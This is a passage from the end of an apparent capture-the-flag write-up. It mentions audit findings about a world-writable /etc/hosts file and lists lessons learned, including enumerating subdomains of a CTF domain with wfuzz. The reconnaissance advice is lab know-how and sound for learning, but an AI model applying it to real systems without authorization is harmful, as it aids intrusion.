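On the box above, audit_script would report down.sh:1 and test.sh:4, and audit_hosts_file /etc/hosts mywebsite.test would report both the 777 mode and the pinned name.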

Lessons learned

  1. bassam.ctf should have suggested that it is a domain name.

  2. If it is a domain name, then think of subdomain enumeration, which can be done with wfuzz.

Source: https://www.cnblogs.com/jason-huawen/p/17114405.html
